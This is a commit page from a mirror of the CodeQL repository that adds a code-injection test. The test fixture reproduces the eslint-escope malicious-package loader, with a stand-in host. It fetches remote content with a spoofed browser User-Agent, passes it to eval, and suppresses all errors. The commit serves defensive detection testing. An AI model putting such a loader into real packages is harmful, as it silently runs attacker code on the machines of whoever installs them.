hohn/codeql
1
0
Fork 0
mirror of https://github.com/github/codeql.git synced 2026-04-30 19:26:02 +02:00
Code Issues Packages Projects Releases Wiki Activity

JavaScript: add the ESLint attack as a test

Browse Source
This commit is contained in:
Robert Marsh
2018-08-14 12:59:41 -07:00
parent 4698d13a0d
commit aaeda5dfcc
2 changed files with 28 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
javascript/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
View File

@@ -12,6 +12,7 @@
| angularjs.js:47:16:47:30 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:47:16:47:30 | document.cookie | User-provided value |
| angularjs.js:50:22:50:36 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:50:22:50:36 | document.cookie | User-provided value |
| angularjs.js:53:32:53:46 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:53:32:53:46 | document.cookie | User-provided value |
| eslint-escope-build.js:21:16:21:16 | c | $@ flows to here and is interpreted as code. | eslint-escope-build.js:20:22:20:22 | c | User-provided value |
| express.js:7:24:7:69 | "return ... + "];" | $@ flows to here and is interpreted as code. | express.js:7:44:7:62 | req.param("wobble") | User-provided value |
| express.js:9:34:9:79 | "return ... + "];" | $@ flows to here and is interpreted as code. | express.js:9:54:9:72 | req.param("wobble") | User-provided value |
| express.js:12:8:12:53 | "return ... + "];" | $@ flows to here and is interpreted as code. | express.js:12:28:12:46 | req.param("wobble") | User-provided value |

27
javascript/ql/test/query-tests/Security/CWE-094/eslint-escope-build.js Normal file
View File

@@ -0,0 +1,27 @@
// the eslint-escope attack, with the URL altered to avoid triggering antivirus software.
// See https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes
try {
var https = require("https");
https
.get(
{
hostname: "example.com",
path: "modified/to/avoid/antivirus",
headers: {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
Accept:
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}
},
r => {
r.setEncoding("utf8");
r.on("data", c => {
eval(c);
});
r.on("error", () => {});
}
)
.on("error", () => {});
} catch (e) {}